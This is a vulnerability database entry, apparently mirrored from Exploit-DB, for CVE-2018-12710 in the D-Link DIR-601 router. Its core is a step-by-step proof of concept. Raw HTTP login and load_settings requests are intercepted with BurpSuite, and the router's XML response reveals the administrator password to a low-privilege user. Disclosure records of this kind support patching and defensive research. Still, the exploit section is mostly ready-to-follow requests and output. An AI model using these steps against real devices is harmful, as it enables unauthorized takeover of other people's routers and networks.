ID

VAR-E-201808-0147


CVE

cve_id:CVE-2018-12710

Trust: 1.0

sources: EXPLOIT-DB: 45306

EDB ID

45306


TITLE

DLink DIR-601 - Credential Disclosure - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 45306

DESCRIPTION

DLink DIR-601 - Credential Disclosure. CVE-2018-12710. webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 45306

AFFECTED PRODUCTS

vendor:dlink model:dir-601 scope:- version:-

Trust: 1.6

sources: EXPLOIT-DB: 45306 // EDBNET: 99136

EXPLOIT

# Exploit Title: DLink DIR-601 - Credential Disclosure
# Google Dork: N/A
# Date: 2018-06-24
# Exploit Author: Kevin Randall
# Vendor Homepage: https://www.dlink.com
# Software Link: N/A
# Version: Firmware: 2.02NA Hardware Version B1
# Tested on: Windows 10 + Mozilla Firefox
# CVE : CVE-2018-12710

# 1. Description
# Being local to the network and having only "User" account (which is a low privilege account)
# access, an attacker can intercept the response from a POST request to obtain "Admin"
# rights due to the admin password being displayed in XML.

# 2. Proof of Concept
# Tools to use:
# - BurpSuite
# - Browser of your choice

# 3: Login with "User" role account:
*My "User" role account does not have a password in this example*
POST /my_cgi.cgi?0.4008728147399542 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-AU,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1/login_real.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
DNT: 1
Connection: close

request=login&user_user_name=dXNlcg==&user_user_pwd=&user_type=1

# 4: When logged into the access point, click on the Tools option

# 5: You should see a request similar to the following:

POST /my_cgi.cgi?0.9277791631615954 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-AU,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1/tools_admin.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 277
DNT: 1
Connection: close

request=load_settings&table_name=admin_user&table_name=user_user&table_name=graph_auth&table_name=remote_management&table_name=system&table_name=virtual_server&table_name=port_forwarding&table_name=application_rules&table_name=inbound_filter&table_name=fw_ver&table_name=hw_ver

# 6: Right click on this request and choose "Do Intercept response from this request"

# 7: You will see a response similar to the following:

HTTP/1.1 200 OK
Content-type: text/xml
Connection: close
Date: Sat, 01 Jan 2011 00:19:56 GMT
Server: lighttpd/1.4.28
Content-Length: 20088

<?xml version="1.0" encoding="UTF-8"?><root><login_level>0</login_level><admin_user><admin_user_name>admin</admin_user_name>
<admin_user_pwd>testagain</admin_user_pwd><admin_level>1</admin_level></admin_user><user_user><user_user_name>user</user_user_name>
<user_user_pwd></user_user_pwd><user_level>0 ...

Trust: 1.0

sources: EXPLOIT-DB: 45306

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 45306

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 45306

TYPE

Credential Disclosure

Trust: 1.6

sources: EXPLOIT-DB: 45306 // EDBNET: 99136

CREDITS

Kevin Randall

Trust: 0.6

sources: EXPLOIT-DB: 45306

EXTERNAL IDS

db:EXPLOIT-DB id:45306

Trust: 1.6

db:NVD id:CVE-2018-12710

Trust: 1.0

db:EDBNET id:99136

Trust: 0.6

sources: EXPLOIT-DB: 45306 // EDBNET: 99136

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2018-12710

Trust: 1.0

url:https://www.exploit-db.com/exploits/45306/

Trust: 0.6

sources: EXPLOIT-DB: 45306 // EDBNET: 99136

SOURCES

db:EXPLOIT-DB id:45306
db:EDBNET id:99136

LAST UPDATE DATE

2022-07-27T09:18:16.750000+00:00


SOURCES RELEASE DATE

db:EXPLOIT-DB id:45306 date:2018-08-30T00:00:00
db:EDBNET id:99136 date:2018-08-30T00:00:00